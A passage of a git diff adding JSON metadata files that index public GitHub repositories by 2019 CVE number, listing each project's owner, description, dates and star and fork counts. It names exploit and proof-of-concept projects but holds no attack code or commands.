0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0803.json b/2019/CVE-2019-0803.json new file mode 100644 index 0000000000..de48d6e30a --- /dev/null +++ b/2019/CVE-2019-0803.json @@ -0,0 +1,64 @@ +[ + { + "id": 187189205, + "name": "CVE-2019-0803", + "full_name": "Iamgublin\/CVE-2019-0803", + "owner": { + "login": "Iamgublin", + "id": 16526066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16526066?v=4", + "html_url": "https:\/\/github.com\/Iamgublin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Iamgublin\/CVE-2019-0803", + "description": "Win32k Elevation of Privilege Poc", + "fork": false, + "created_at": "2019-05-17T09:37:05Z", + "updated_at": "2023-09-10T09:25:45Z", + "pushed_at": "2019-05-17T10:53:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 187201710, + "name": "CVE-2019-0803", + "full_name": "ExpLife0011\/CVE-2019-0803", + "owner": { + "login": "ExpLife0011", + "id": 37372761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37372761?v=4", + "html_url": "https:\/\/github.com\/ExpLife0011", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ExpLife0011\/CVE-2019-0803", + "description": "Win32k Elevation of Privilege Poc", + "fork": false, + "created_at": "2019-05-17T11:05:22Z", + "updated_at": "2024-08-12T19:49:00Z", + "pushed_at": "2019-05-17T10:53:29Z", + "stargazers_count": 80, + "watchers_count": 80, + "has_discussions": false, + "forks_count": 69, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 69, + "watchers": 80, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0808.json b/2019/CVE-2019-0808.json new file mode 100644 index 0000000000..f98f673e57 --- /dev/null +++ b/2019/CVE-2019-0808.json @@ -0,0 +1,126 @@ +[ + { + "id": 177576776, + "name": "cve-2019-0808-poc", + "full_name": "ze0r\/cve-2019-0808-poc", + "owner": { + "login": "ze0r", + "id": 43227253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43227253?v=4", + "html_url": "https:\/\/github.com\/ze0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ze0r\/cve-2019-0808-poc", + "description": "cve-2019-0808-poc", + "fork": false, + "created_at": "2019-03-25T11:53:35Z", + "updated_at": "2024-08-12T19:47:13Z", + "pushed_at": "2019-03-25T12:10:40Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 182577297, + "name": "CVE-2019-0808", + "full_name": "rakesh143\/CVE-2019-0808", + "owner": { + "login": "rakesh143", + "id": 12870599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12870599?v=4", + "html_url": "https:\/\/github.com\/rakesh143", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rakesh143\/CVE-2019-0808", + "description": null, + "fork": false, + "created_at": "2019-04-21T20:04:34Z", + "updated_at": "2024-08-12T19:48:07Z", + "pushed_at": "2019-04-21T20:07:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 187227372, + "name": "CVE-2019-0808", + "full_name": "exodusintel\/CVE-2019-0808", + "owner": { + "login": "exodusintel", + "id": 16653014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16653014?v=4", + "html_url": "https:\/\/github.com\/exodusintel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exodusintel\/CVE-2019-0808", + "description": "Win32k Exploit by Grant Willcox", + "fork": false, + "created_at": "2019-05-17T14:08:01Z", + "updated_at": "2024-08-12T19:49:00Z", + "pushed_at": "2019-05-17T14:17:00Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 40, + "watchers": 88, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 298551247, + "name": "CVE-2019-0808-32-64-exp", + "full_name": "bb33bb\/CVE-2019-0808-32-64-exp", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2019-0808-32-64-exp", + "description": null, + "fork": false, + "created_at": "2020-09-25T11:17:41Z", + "updated_at": "2023-05-15T02:38:55Z", + "pushed_at": "2020-08-07T06:31:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0841.json b/2019/CVE-2019-0841.json new file mode 100644 index 0000000000..e541008b1b --- /dev/null +++ b/2019/CVE-2019-0841.json @@ -0,0 +1,126 @@ +[ + { + "id": 179680988, + "name": "CVE-2019-0841", + "full_name": "rogue-kdc\/CVE-2019-0841", + "owner": { + "login": "rogue-kdc", + "id": 49311295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49311295?v=4", + "html_url": "https:\/\/github.com\/rogue-kdc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rogue-kdc\/CVE-2019-0841", + "description": "PoC code for CVE-2019-0841 Privilege Escalation vulnerability", + "fork": false, + "created_at": "2019-04-05T12:53:52Z", + "updated_at": "2024-08-12T19:47:37Z", + "pushed_at": "2019-04-09T16:49:19Z", + "stargazers_count": 242, + "watchers_count": 242, + "has_discussions": false, + "forks_count": 97, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 97, + "watchers": 242, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 180605162, + "name": "CVE-2019-0841", + "full_name": "likekabin\/CVE-2019-0841", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2019-0841", + "description": null, + "fork": false, + "created_at": "2019-04-10T14:58:22Z", + "updated_at": "2024-08-12T19:47:47Z", + "pushed_at": "2019-04-10T14:58:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 191441504, + "name": "CVE-2019-0841-BYPASS", + "full_name": "0x00-0x00\/CVE-2019-0841-BYPASS", + "owner": { + "login": "0x00-0x00", + "id": 23364530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23364530?v=4", + "html_url": "https:\/\/github.com\/0x00-0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x00-0x00\/CVE-2019-0841-BYPASS", + "description": "A fully automatic CVE-2019-0841 bypass targeting all versions of Edge in Windows 10.", + "fork": false, + "created_at": "2019-06-11T20:05:26Z", + "updated_at": "2024-08-12T19:49:57Z", + "pushed_at": "2019-06-11T20:49:42Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 58, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 479626248, + "name": "CVE-2019-0841", + "full_name": "mappl3\/CVE-2019-0841", + "owner": { + "login": "mappl3", + "id": 47136159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47136159?v=4", + "html_url": "https:\/\/github.com\/mappl3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mappl3\/CVE-2019-0841", + "description": null, + "fork": false, + "created_at": "2022-04-09T05:19:25Z", + "updated_at": "2022-04-09T05:19:25Z", + "pushed_at": "2022-04-09T05:23:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0859.json b/2019/CVE-2019-0859.json new file mode 100644 index 0000000000..d53b09a050 --- /dev/null +++ b/2019/CVE-2019-0859.json @@ -0,0 +1,33 @@ +[ + { + "id": 190688603, + "name": "CVE-2019-0859-1day-Exploit", + "full_name": "Sheisback\/CVE-2019-0859-1day-Exploit", + "owner": { + "login": "Sheisback", + "id": 8948193, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8948193?v=4", + "html_url": "https:\/\/github.com\/Sheisback", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sheisback\/CVE-2019-0859-1day-Exploit", + "description": "CVE-2019-0859 1day Exploit", + "fork": false, + "created_at": "2019-06-07T04:37:34Z", + "updated_at": "2024-08-12T19:49:46Z", + "pushed_at": "2020-02-11T06:46:50Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 40, + "watchers": 120, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0887.json b/2019/CVE-2019-0887.json new file mode 100644 index 0000000000..db1b3b3542 --- /dev/null +++ b/2019/CVE-2019-0887.json @@ -0,0 +1,64 @@ +[ + { + "id": 280856867, + "name": "CVE-2019-0887", + "full_name": "qianshuidewajueji\/CVE-2019-0887", + "owner": { + "login": "qianshuidewajueji", + "id": 60954139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60954139?v=4", + "html_url": "https:\/\/github.com\/qianshuidewajueji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qianshuidewajueji\/CVE-2019-0887", + "description": null, + "fork": false, + "created_at": "2020-07-19T12:03:44Z", + "updated_at": "2023-01-30T03:46:23Z", + "pushed_at": "2020-07-19T12:23:34Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 329543907, + "name": "CVE-2019-0887", + "full_name": "t43Wiu6\/CVE-2019-0887", + "owner": { + "login": "t43Wiu6", + "id": 40162856, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40162856?v=4", + "html_url": "https:\/\/github.com\/t43Wiu6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t43Wiu6\/CVE-2019-0887", + "description": "exp for CVE-2019-0887", + "fork": false, + "created_at": "2021-01-14T07:49:51Z", + "updated_at": "2024-10-31T23:11:57Z", + "pushed_at": "2021-01-15T02:44:14Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0888.json b/2019/CVE-2019-0888.json new file mode 100644 index 0000000000..14834e6bb0 --- /dev/null +++ b/2019/CVE-2019-0888.json @@ -0,0 +1,33 @@ +[ + { + "id": 193166704, + "name": "CVE-2019-0888", + "full_name": "sophoslabs\/CVE-2019-0888", + "owner": { + "login": "sophoslabs", + "id": 40878494, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40878494?v=4", + "html_url": "https:\/\/github.com\/sophoslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sophoslabs\/CVE-2019-0888", + "description": "PoC for CVE-2019-0888 - Use-After-Free in Windows ActiveX Data Objects (ADO)", + "fork": false, + "created_at": "2019-06-21T22:26:52Z", + "updated_at": "2024-11-17T08:48:58Z", + "pushed_at": "2019-07-09T18:40:05Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 40, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-0986.json b/2019/CVE-2019-0986.json new file mode 100644 index 0000000000..546c7afc07 --- /dev/null +++ b/2019/CVE-2019-0986.json @@ -0,0 +1,33 @@ +[ + { + "id": 176955881, + "name": "CVE-2019-0986", + "full_name": "padovah4ck\/CVE-2019-0986", + "owner": { + "login": "padovah4ck", + "id": 13963076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13963076?v=4", + "html_url": "https:\/\/github.com\/padovah4ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/padovah4ck\/CVE-2019-0986", + "description": "Security Research", + "fork": false, + "created_at": "2019-03-21T13:58:25Z", + "updated_at": "2024-08-12T19:47:01Z", + "pushed_at": "2021-12-23T16:31:30Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 36, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10008.json b/2019/CVE-2019-10008.json new file mode 100644 index 0000000000..1fa308573f --- /dev/null +++ b/2019/CVE-2019-10008.json @@ -0,0 +1,33 @@ +[ + { + "id": 179552575, + "name": "CVE-2019-10008", + "full_name": "ignis-sec\/CVE-2019-10008", + "owner": { + "login": "ignis-sec", + "id": 16636092, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16636092?v=4", + "html_url": "https:\/\/github.com\/ignis-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ignis-sec\/CVE-2019-10008", + "description": "ManageEngine Service Desk Plus 10.0 Privilaged account Hijacking", + "fork": false, + "created_at": "2019-04-04T18:20:23Z", + "updated_at": "2024-08-12T19:47:36Z", + "pushed_at": "2019-08-17T15:17:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1002101.json b/2019/CVE-2019-1002101.json new file mode 100644 index 0000000000..57edafa85c --- /dev/null +++ b/2019/CVE-2019-1002101.json @@ -0,0 +1,33 @@ +[ + { + "id": 179330253, + "name": "CVE-2019-1002101-Helpers", + "full_name": "brompwnie\/CVE-2019-1002101-Helpers", + "owner": { + "login": "brompwnie", + "id": 8638589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8638589?v=4", + "html_url": "https:\/\/github.com\/brompwnie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brompwnie\/CVE-2019-1002101-Helpers", + "description": "PoC helper scripts and Dockerfile for CVE-2019-1002101", + "fork": false, + "created_at": "2019-04-03T16:36:58Z", + "updated_at": "2024-08-12T19:47:34Z", + "pushed_at": "2019-04-03T17:35:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1003000.json b/2019/CVE-2019-1003000.json new file mode 100644 index 0000000000..751d02171a --- /dev/null +++ b/2019/CVE-2019-1003000.json @@ -0,0 +1,172 @@ +[ + { + "id": 89426502, + "name": "Exploit-Development", + "full_name": "wetw0rk\/Exploit-Development", + "owner": { + "login": "wetw0rk", + "id": 20763546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20763546?v=4", + "html_url": "https:\/\/github.com\/wetw0rk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wetw0rk\/Exploit-Development", + "description": "CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002", + "fork": false, + "created_at": "2017-04-26T02:03:43Z", + "updated_at": "2024-08-12T19:29:24Z", + "pushed_at": "2020-02-29T21:27:15Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 56, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 170809838, + "name": "cve-2019-1003000-jenkins-rce-poc", + "full_name": "adamyordan\/cve-2019-1003000-jenkins-rce-poc", + "owner": { + "login": "adamyordan", + "id": 9531164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9531164?v=4", + "html_url": "https:\/\/github.com\/adamyordan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adamyordan\/cve-2019-1003000-jenkins-rce-poc", + "description": "Jenkins RCE Proof-of-Concept: SECURITY-1266 \/ CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)", + "fork": false, + "created_at": "2019-02-15T05:59:24Z", + "updated_at": "2024-11-13T09:56:19Z", + "pushed_at": "2019-04-01T13:19:49Z", + "stargazers_count": 311, + "watchers_count": 311, + "has_discussions": false, + "forks_count": 94, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-1003000", + "exploit", + "groovy", + "information-security", + "jenkins", + "poc", + "rce", + "security", + "security-1266" + ], + "visibility": "public", + "forks": 94, + "watchers": 311, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 174141495, + "name": "CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins", + "full_name": "slowmistio\/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins", + "owner": { + "login": "slowmistio", + "id": 25600994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25600994?v=4", + "html_url": "https:\/\/github.com\/slowmistio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/slowmistio\/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins", + "description": "Python CVE-2019-1003000 and CVE-2018-1999002 Pre-Auth RCE Jenkins ", + "fork": false, + "created_at": "2019-03-06T12:31:57Z", + "updated_at": "2019-03-06T12:32:00Z", + "pushed_at": "2019-02-23T10:01:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 183322760, + "name": "CVE-2019-1003000_RCE-DETECTION", + "full_name": "1NTheKut\/CVE-2019-1003000_RCE-DETECTION", + "owner": { + "login": "1NTheKut", + "id": 26243759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26243759?v=4", + "html_url": "https:\/\/github.com\/1NTheKut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1NTheKut\/CVE-2019-1003000_RCE-DETECTION", + "description": "A C# module to detect if a Jenkins server is vulnerable to the RCE vulnerability found in CVE-2019-1003000 (chained with CVE-2018-1000861 for pre-auth RCE)", + "fork": false, + "created_at": "2019-04-24T23:52:42Z", + "updated_at": "2024-08-12T19:48:14Z", + "pushed_at": "2019-05-01T07:11:28Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "csharp", + "cve", + "jenkins" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 458501569, + "name": "Jenkins_CVE-2019-1003000", + "full_name": "purple-WL\/Jenkins_CVE-2019-1003000", + "owner": { + "login": "purple-WL", + "id": 63894044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63894044?v=4", + "html_url": "https:\/\/github.com\/purple-WL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purple-WL\/Jenkins_CVE-2019-1003000", + "description": null, + "fork": false, + "created_at": "2022-02-12T11:26:07Z", + "updated_at": "2023-04-19T07:47:39Z", + "pushed_at": "2022-02-12T11:27:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1006.json b/2019/CVE-2019-1006.json new file mode 100644 index 0000000000..193d26aca6 --- /dev/null +++ b/2019/CVE-2019-1006.json @@ -0,0 +1,33 @@ +[ + { + "id": 619093652, + "name": "CVE-2019-1006", + "full_name": "521526\/CVE-2019-1006", + "owner": { + "login": "521526", + "id": 47726460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47726460?v=4", + "html_url": "https:\/\/github.com\/521526", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/521526\/CVE-2019-1006", + "description": null, + "fork": false, + "created_at": "2023-03-26T08:47:39Z", + "updated_at": "2023-03-26T09:01:41Z", + "pushed_at": "2023-03-26T09:01:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10086.json b/2019/CVE-2019-10086.json new file mode 100644 index 0000000000..c5d2a6ddeb --- /dev/null +++ b/2019/CVE-2019-10086.json @@ -0,0 +1,33 @@ +[ + { + "id": 218899327, + "name": "CVE-2019-10086", + "full_name": "evilangelplus\/CVE-2019-10086", + "owner": { + "login": "evilangelplus", + "id": 56948123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56948123?v=4", + "html_url": "https:\/\/github.com\/evilangelplus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evilangelplus\/CVE-2019-10086", + "description": "wait for exp.", + "fork": false, + "created_at": "2019-11-01T02:36:17Z", + "updated_at": "2019-11-01T02:36:17Z", + "pushed_at": "2019-11-01T02:36:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10092.json b/2019/CVE-2019-10092.json new file mode 100644 index 0000000000..b1e47e919a --- /dev/null +++ b/2019/CVE-2019-10092.json @@ -0,0 +1,71 @@ +[ + { + "id": 228854670, + "name": "CVE-2019-10092_Docker", + "full_name": "motikan2010\/CVE-2019-10092_Docker", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2019-10092_Docker", + "description": "CVE-2019-10092 Docker - Apache HTTP Server", + "fork": false, + "created_at": "2019-12-18T14:15:13Z", + "updated_at": "2024-08-12T19:55:50Z", + "pushed_at": "2020-01-07T03:22:20Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806744388, + "name": "CVE-2019-10092", + "full_name": "mbadanoiu\/CVE-2019-10092", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2019-10092", + "description": "CVE-2019-10092: Limited Cross-Site Scripting via \"Proxy Error\" Page in Apache HTTP Server", + "fork": false, + "created_at": "2024-05-27T20:09:36Z", + "updated_at": "2024-06-09T20:19:02Z", + "pushed_at": "2024-06-09T20:18:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2019-10092", + "cves", + "open-redirect", + "user-interaction" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1010054.json b/2019/CVE-2019-1010054.json new file mode 100644 index 0000000000..d29f8be61f --- /dev/null +++ b/2019/CVE-2019-1010054.json @@ -0,0 +1,33 @@ +[ + { + "id": 255439864, + "name": "CSRF-breach", + "full_name": "chaizeg\/CSRF-breach", + "owner": { + "login": "chaizeg", + "id": 42580324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42580324?v=4", + "html_url": "https:\/\/github.com\/chaizeg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chaizeg\/CSRF-breach", + "description": "Reproduction of CSRF breach CVE-2019-1010054", + "fork": false, + "created_at": "2020-04-13T20:56:00Z", + "updated_at": "2024-08-12T20:00:09Z", + "pushed_at": "2020-04-13T21:03:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1010268.json b/2019/CVE-2019-1010268.json new file mode 100644 index 0000000000..56a238fe9a --- /dev/null +++ b/2019/CVE-2019-1010268.json @@ -0,0 +1,33 @@ +[ + { + "id": 718825219, + "name": "CVE-2019-1010268", + "full_name": "Tonyynot14\/CVE-2019-1010268", + "owner": { + "login": "Tonyynot14", + "id": 35306316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35306316?v=4", + "html_url": "https:\/\/github.com\/Tonyynot14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tonyynot14\/CVE-2019-1010268", + "description": "Python exploit written for CVE-2019-1010268.", + "fork": false, + "created_at": "2023-11-14T21:50:51Z", + "updated_at": "2023-11-14T21:52:54Z", + "pushed_at": "2023-11-14T22:32:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1010298.json b/2019/CVE-2019-1010298.json new file mode 100644 index 0000000000..0c246eb7d4 --- /dev/null +++ b/2019/CVE-2019-1010298.json @@ -0,0 +1,33 @@ +[ + { + "id": 201962859, + "name": "CVE-2019-1010298", + "full_name": "RKX1209\/CVE-2019-1010298", + "owner": { + "login": "RKX1209", + "id": 964758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/964758?v=4", + "html_url": "https:\/\/github.com\/RKX1209", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RKX1209\/CVE-2019-1010298", + "description": "Proof of Concept of TrustZone exploit ", + "fork": false, + "created_at": "2019-08-12T15:58:06Z", + "updated_at": "2024-11-27T14:28:52Z", + "pushed_at": "2019-08-12T16:01:24Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10149.json b/2019/CVE-2019-10149.json new file mode 100644 index 0000000000..c89e9106f8 --- /dev/null +++ b/2019/CVE-2019-10149.json @@ -0,0 +1,505 @@ +[ + { + "id": 191233980, + "name": "exim-rce-quickfix", + "full_name": "bananaphones\/exim-rce-quickfix", + "owner": { + "login": "bananaphones", + "id": 4877449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4877449?v=4", + "html_url": "https:\/\/github.com\/bananaphones", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bananaphones\/exim-rce-quickfix", + "description": "quick fix for CVE-2019-10149, works on Debian\\Ubuntu\\Centos", + "fork": false, + "created_at": 